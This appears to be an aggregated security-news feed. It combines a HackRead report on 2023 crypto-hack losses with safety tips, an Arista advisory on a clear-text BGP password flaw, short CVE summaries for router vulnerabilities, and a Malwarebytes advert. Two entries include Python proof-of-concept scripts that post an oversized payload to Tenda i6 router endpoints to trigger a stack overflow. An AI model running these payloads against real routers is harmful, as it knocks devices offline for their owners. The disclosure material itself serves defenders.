By Waqas
November 2023 has emerged as the most devastating year for crypto users and the most lucrative for cybercriminals and malicious hackers, as the majority of crypto hacks occurred during that month.
This is a post from HackRead.com Read the original post: Cryptocurrency losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed

According to the crypto bug bounty and cybersecurity firm Immunefi, hackings accounted for $335,574,150 in losses in November 2023, involving 18 incidents.

The world’s leading blockchain cybersecurity platform, Immunefi, has published its Crypto Losses in November 2023 Report, according to which **cryptocurrency losses** have surpassed $1.75 billion due to hacks and rug pull attacks between January and November 2023. This includes 296 distinct incidents. The cryptocurrency ecosystem has witnessed $1,753,707,812 in losses year-to-date (YTD) across 296 specific incidents.

Graph credit: Immunefi

The report is quite concerning. It comes at the same time when the cybersecurity firm Unciphered discovered a critical vulnerability, dubbed ‘**Randstorm**,’ that has put billions of dollars in Bitcoin and crypto assets at risk due to outdated wallets.

In Immunefi’s October 2023 **report**, the Singapore-based Immunefi revealed that cryptocurrency attacks surged by 153% year-over-year in Q3 2023. The two largest exploits targeting Multichain and Mixin Network collectively accounted for 47.5% of all losses. The North Korean state-sponsored hacking group **Lazarus Group**’s cyberattack represented 30% of the total losses, with $208.6 million in stolen funds.

According to Immunefi’s latest **report** (PDF), a record-breaking $343 million was lost to fraud and hacks in November 2023 alone, making it the highest monthly loss this year, representing a significant 15.4x increase from October 2023’s losses that amounted to $22 million.

Hackings accounted for $335,574,150 in losses in November 2023, involving 18 incidents. This highlights that hacking poses a persistent threat in the cryptocurrency space.

On the other hand, fraudulent activities resulted in losses of $7,464,660 in 23 separate incidents, which is comparatively lower than hacking but remains a concerning issue in the industry.

In a notable shift, Centralized Finance (**CeFi**) emerged as the primary target for exploits in November 2023, surpassing Decentralized Finance (**DeFi**) in lost funds. Immunefi found that CeFi accounted for 53.8% of overall losses, whereas DeFi accounted for 46.2%. These spikes are primarily attributed to high-profile attacks on platforms like HTX Exchange, Poloniex, and Kronos Research.

DeFi platforms recorded $158,638,810 in losses in November 2023 in 37 distinct incidents, making DeFi a vulnerable sector. CeFi platforms suffered $184,400,000 in losses in November 2023 in four incidents.

The BNB Chain and **Ethereum blockchains** remained the most targeted platforms in November 2023, accounting for more than half (83%) of the total losses in all targeted chains.

BNB Chain became a target of 22 incidents, leading to losses of 53.7% of the total losses, whereas Ethereum accounted for 29.3% of the total losses with 12 incidents. Arbitrum, Optimism, Avalanche, Fantom, and Heco Chain each suffered one attack in November 2023, contributing the remaining 2.4% of the total losses.

Immunefi is the premier **bug bounty** and security services provider, safeguarding Web3 ecosystems and protecting a staggering $50 billion in user funds with its vast network of white hackers.

Graph credit: Immunefi

**Immunefi** empowers cybersecurity experts to scrutinize project code, detect and responsibly disclose vulnerabilities, and offer rewards for their contributions. This collaborative approach, according to the company, has resulted in the disbursement of over $85 million in total bounties, averting potential losses of over $25 billion in user funds. Since its inception, Immunefi has saved over $25 billion from being stolen.

As an investor in the ever-evolving world of cryptocurrency, DeFi, blockchain, and Web3, it’s crucial to prioritize the security of your digital assets. Here are 5 essential tips to protect your funds from hackers and cyber attacks:

****Secure Your Wallets****

*   **Use Cold Wallets:** These hardware devices store your private keys offline, making them significantly less susceptible to cyberattacks compared to hot wallets (software wallets connected to the internet). Popular cold wallets include Ledger, Trezor, and KeepKey.
*   **Diversify Your Wallets:** Don’t store all your funds in one wallet. Distribute them across multiple wallets for better risk management.
*   **Implement Strong Passwords:** Use unique and complex passwords for all your wallets and exchanges. Consider password managers for efficient management.
*   **Enable 2-Factor Authentication (2FA):** 2FA adds an extra layer of security by requiring a second verification factor, like a code sent to your phone, when logging in or making transactions.

****Practice Cybersecurity Hygiene****

*   **Stay Vigilant:** Be wary of phishing scams, unsolicited emails, and suspicious links. Never share your private keys or seed phrases with anyone, even those claiming to be support personnel.
*   **Keep Software Updated:** Ensure your operating systems, wallets, and other relevant software are updated with the latest security patches.
*   **Use Secure Networks:** Avoid using public Wi-Fi for accessing your crypto accounts. Opt for secure, private networks whenever possible.
*   **Be Cautious of dApps**: Before interacting with any dApp (decentralized application), research its reputation and security practices.

****Choose Reputable Platforms:****

*   **Research Exchanges:** Before investing in an exchange, thoroughly research its security features, reputation, and regulatory compliance.
*   **Prioritize Transparency:** Choose platforms that prioritize transparency in their operations and code.
*   **Beware of Unknown Projects:** Exercise caution when investing in unfamiliar projects or dApps. Conduct thorough research and due diligence before committing any funds.

****Stay Informed and Educate Yourself:****

*   **Continuously learn:** The crypto landscape is constantly evolving, so stay updated on the latest security threats and best practices. Follow reliable sources and participate in educational communities.
*   **Be aware of common scams:** Learn about common phishing tactics, exit scams, and other fraudulent activities targeting crypto investors.
*   **Seek expert advice:** If you’re unsure about any aspect of crypto security, don’t hesitate to consult with a trusted security expert or financial advisor.

****Backup Your Keys:****

*   **Always have a backup plan:** Create backups of your private keys and seed phrases and store them securely offline, preferably in multiple locations.
*   **Consider multi-signature wallets:** These wallets require multiple keys to authorize transactions, offering an additional layer of protection.

Lastly, but most importantly, visit Hackread.com regularly. Follow us on **X (formerly Twitter)**, **Facebook**, or **LinkedIn** to stay updated on daily cybersecurity news and threats.

****_RELATED ARTICLES_****

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **Crypto Scammers Exploit Gaza Crisis in Donation Scam**
3.  **We Need Smarter Smart Contracts To Prevent DeFi Hacks**
4.  **New MortalKombat Ransomware Attack Aiming for Crypto Wallets**
5.  **Scammers Use Fake Ledger App on Microsoft Store to Steal $800K**
6.  **8,000 Solana Wallets Drained Millions Worth of Crypto in Cyberattack**

Cryptocurrency losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed

On affected platforms running Arista MOS, the configuration of a BGP password will cause the password to be logged in clear text that can be revealed in local logs or remote logging servers by authenticated users, as well as appear in clear text in the device’s running config. 


**Date: December 5, 2023**

Revision

Date

Changes

1.0

December 5, 2023

Initial release

The CVE-ID tracking this issue: CVE-2023-24547  
CVSSv3.1 Base Score: 5.9 (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:H)  
Common Weakness Enumeration: CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer  
This vulnerability is being tracked by BUG868319, BUG873034, MOS-2222, MOS-2255.

**Description**

On affected platforms running Arista MOS, the configuration of a BGP password will cause the password to be logged in clear text that can be revealed in local logs or remote logging servers by authenticated users, as well as appear in clear text in the device’s running config. This could result in unauthorized route announcements from malicious peers or cause traffic loss.

This issue was discovered internally and Arista is not aware of any malicious uses of this issue in customer networks.

**Vulnerability Assessment****Affected Software******MOS Versions****

*   MOS-0.13.0 onwards

**Affected Platforms**

The following products **are** affected by this vulnerability:

*   Arista 7130 Systems running MOS
*   Pre-Arista labeled devices (Metamako)

The following product versions and platforms **are not** affected by this vulnerability:

*   Arista EOS-based products:  
    *   720D Series
    *   720XP/722XPM Series
    *   750X Series
    *   7010 Series
    *   7010X Series
    *   7020R Series
    *   7130 Series running EOS
    *   7150 Series
    *   7160 Series
    *   7170 Series
    *   7050X/X2/X3/X4 Series
    *   7060X/X2/X4/X5 Series
    *   7250X Series
    *   7260X/X3 Series
    *   7280E/R/R2/R3 Series
    *   7300X/X3 Series
    *   7320X Series
    *   7358X4 Series
    *   7368X4 Series
    *   7388X5 Series
    *   7500E/R/R2/R3 Series
    *   7800R3 Series
    *   CloudEOS
    *   cEOS-lab
    *   vEOS-lab
    *   AWE 5000 Series
*   Arista Wireless Access Points
*   CloudVision WiFi, virtual appliance or physical appliance
*   CloudVision WiFi cloud service delivery
*   CloudVision eXchange, virtual or physical appliance
*   CloudVision Portal, virtual appliance or physical appliance
*   CloudVision AGNI
*   Arista Converged Cloud Fabric and DANZ Monitoring Fabric (Formerly Big Switch Nodes for BCF and BMF)
*   Arista Network Detection and Response (NDR) Security Platform (Formerly Awake NDR)
*   Arista Edge Threat Management - Arista NG Firewall and Arista Micro Edge (Formerly Untangle)

**Required Configuration for Exploitation**

In order to be vulnerable to CVE-2023-24547 the following condition must be met:

A BGP password must be configured and be in plain text. An example of this is shown below:

switch>show running-config bgp
router bgp 65000
   neighbor 192.0.2.1 remote-as 66000
   neighbor 192.0.2.1 password pA$$w0rd

If a BGP password is not configured there is no exposure to this issue.

**Indicators of Compromise**

No indicators of compromise exist.

**Mitigation**

No mitigation exists.

**Resolution**

The recommended resolution is to upgrade to a remediated software version at your earliest convenience. Arista recommends customers move to the latest version of each release that contains all the fixes listed below. For more information about upgrading see the MOS User Guide: Updating

CVE-2023-24547 has been fixed in the following releases:

*   MOS-0.36.10 and later releases in the MOS-0.36.x train
*   MOS-0.39.4 and later releases in the MOS-0.39.x train

Because this issue would cause the password to be saved in logs and remote AAA servers it is recommended to also rotate the BGP password, if possible. Upon upgrading to a new release, the BGP password will be obfuscated with the type-7 algorithm as shown below:

switch>show running-config bgp
router bgp 65000
   neighbor 192.0.2.1 remote-as 66000
   neighbor 192.0.2.1 password key 7 00143242404C5B140B

**Hotfix**

The following hotfix can be applied to remediate CVE-2023-24547. The hotfix only applies to the releases listed below and no other releases. All other versions require upgrading to a release containing the fix (as listed above):

*   MOS-0.39.3 and below releases in the MOS-0.39.x train
*   MOS-0.38.1 and below releases in the MOS-0.38.x train
*   MOS-0.37.1 and below releases in the MOS-0.37.x train
*   MOS-0.36.9 and below releases in the MOS-0.36.x train
*   MOS-0.35.3 and below releases in the MOS-0.35.x train
*   MOS-0.34.0 in the MOS-0.34.x train

Please note that the only MOS release trains currently under maintenance support are MOS-0.39.x and MOS-0.36.x. The hotfix working for other releases should not be treated as evidence that these releases continue to be supported. For security it is important to ensure supported releases are used.

Version: 1.0
URL: hotfix-cve-2023-24547-4.0.0-1.14.core2\_64.rpm
SWIX hash:(SHA512)
168b2ee3deb8d4a3151b9c24936ff9d6523557b366ceffc98e57e8bf80638997

For instructions on installation and verification of the hotfix patch, refer to the "How to Install an Application" Guide.

**For More Information**

If you require further assistance, or if you have any further questions regarding this security notice, please contact the Arista Networks Technical Assistance Center (TAC) by one of the following methods:

**Open a Service Request**

By email: This email address is being protected from spambots. You need JavaScript enabled to view it.  
By telephone: 408-547-5502 ; 866-476-0000  
Contact information needed to open a new service request may be found at: https://www.arista.com/en/support/customer-support

CVE-2023-24547: Security Advisory 0090 - Arista

An issue was discovered on Connectize AC21000 G6 641.139.1.1256 allows attackers to run arbitrary commands via use of a crafted string in the ping utility.

CVE-2023-24046: Technical Advisory – Multiple Vulnerabilities in Connectize G6 AC2100 Dual Band Gigabit WiFi Router (CVE-2023-24046, CVE-2023-24047, CVE-2023-24048, CVE-2023-24049, CVE-2023-24050, CVE-2023-24051, CVE

Tenda i6 V1.0.0.8(3856) is vulnerable to Buffer Overflow via /goform/WifiMacFilterSet.

**Tenda APi6 V1.0.0.8(3856) Stack Overflow****Firmware information**

Manufacturer's address:https://www.tenda.com.cn/

Firmware download address: https://www.tenda.com.cn/download/detail-2570.html

**Affected Version****Vulnerability Details**

Vulnerability Location: /goform/WifiMacFilterSet

The length of the ndex parameter is not verified, sprintf can cause stack overflow vulnerability, it can result in dos attacks on routers.

The pages of the router

**POC**

import requests
from pwn import\*

ip \= "192.168.182.21" 
url \= "http://" + ip + "/goform/WifiMacFilterSet"
print(url)

payload \=b'a'\*0x3000

cookie \= {"Cookie":"user="}
data \= {"index": payload,"wl\_radio":0}
response \= requests.post(url, cookies\=cookie, data\=data)
print(response.text)
print("HackAttackSuccess!")

CVE-2023-48964: GitHub - daodaoshao/vul_tenda_i6_2

Tenda i6 V1.0.0.8(3856) is vulnerable to Buffer Overflow via /goform/wifiSSIDget.

**Tenda APi6 V1.0.0.8(3856) Stack Overflow****Firmware information**

Manufacturer's address:https://www.tenda.com.cn/

Firmware download address: https://www.tenda.com.cn/download/detail-2570.html

**Affected Version****Vulnerability Details**

Vulnerability Location: /goform/wifiSSIDget

The length of the ndex parameter is not verified, sprintf can cause stack overflow vulnerability, it can result in dos attacks on routers

The pages of the router

**POC**

import requests from pwn import\*

ip = "192.168.182.21" url = "http://" + ip + "/goform/wifiSSIDget" print(url)

payload =b'a'\*0x3000

cookie = {"Cookie":"user="} data = {"index": payload,"wl\_radio":0} response = requests.post(url, cookies=cookie, data=data) print(response.text) print("HackAttackSuccess!")

CVE-2023-48963: GitHub - daodaoshao/vul_tenda_i6_1

Tenda AC10 version US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via the shareSpeed parameter in the function fromSetWifiGuestBasic.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-45484: IOTvul/assets/fromSetWifiGuestBasic_code.png at master · l3m0nade/IOTvul

Stack Overflow vulnerability in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the ssid parameter in the function form_fast_setting_wifi_set.

CVE-2023-49044: IOT_VULN/Tenda/AX1803/form_fast_setting_wifi_set.md at main · Anza2001/IOT_VULN

Heap Overflow vulnerability in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the schedStartTime parameter or the schedEndTime parameter in the function setSchedWifi.

CVE-2023-49042: IOT_VULN/Tenda/AX1803/setSchedWifi.md at main · Anza2001/IOT_VULN

A vulnerability was found in Tecno 4G Portable WiFi TR118 TR118-M30E-RR-D-EnFrArSwHaPo-OP-V008-20220830. It has been declared as critical. This vulnerability affects unknown code of the file /goform/goform_get_cmd_process of the component Ping Tool. The manipulation of the argument url leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-246130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-6304

We’ve got good news. Malwarebytes is now offering 50% off our products to students, wherever you are in the world.

Technology is now an indispensable part of student life, used for everything from socialising and calling home, to writing and researching essays. Unfortunately, that makes students taking their first steps into adult life a prime target for cybercrime.

But how can you be sure the Wi-Fi network you’re connecting to at your library or local coffee shop is safe? What about when you’re inside college walls? More than that, your social media accounts likely hold a lot of information about you, information you don’t want to get into the wrong hands.

It’s hard to know who to trust online, and one click on a dodgy link could lead to compromised accounts, identity theft or even malware.

And, as one student we spoke to said “Nothing is worse than losing a school essay”.

We know you need to protect yourself and your important files online, but we also know that you’re probably feeling strapped for cash at the moment.

We’ve got good news. Malwarebytes is now offering 50% off our products to students, wherever you are in the world.

Here’s what we can help with:

*   Protect your important essays from ransomware and other nasties with Premium Security
*   Help you shop online safer, with protection against infected ad and credit card skimmers in Browser Guard
*   Keep your identity safe and protect your social media accounts with Identity Theft Protection
*   Block trackers and ads with Browser Guard
*   Work safely in coffee shops, libraries and other public places with Privacy VPN
*   Game faster and in peace while staying protected by using Play mode to suspend notifications

Find out more and see pricing on our student discount page.

Tag

#wifi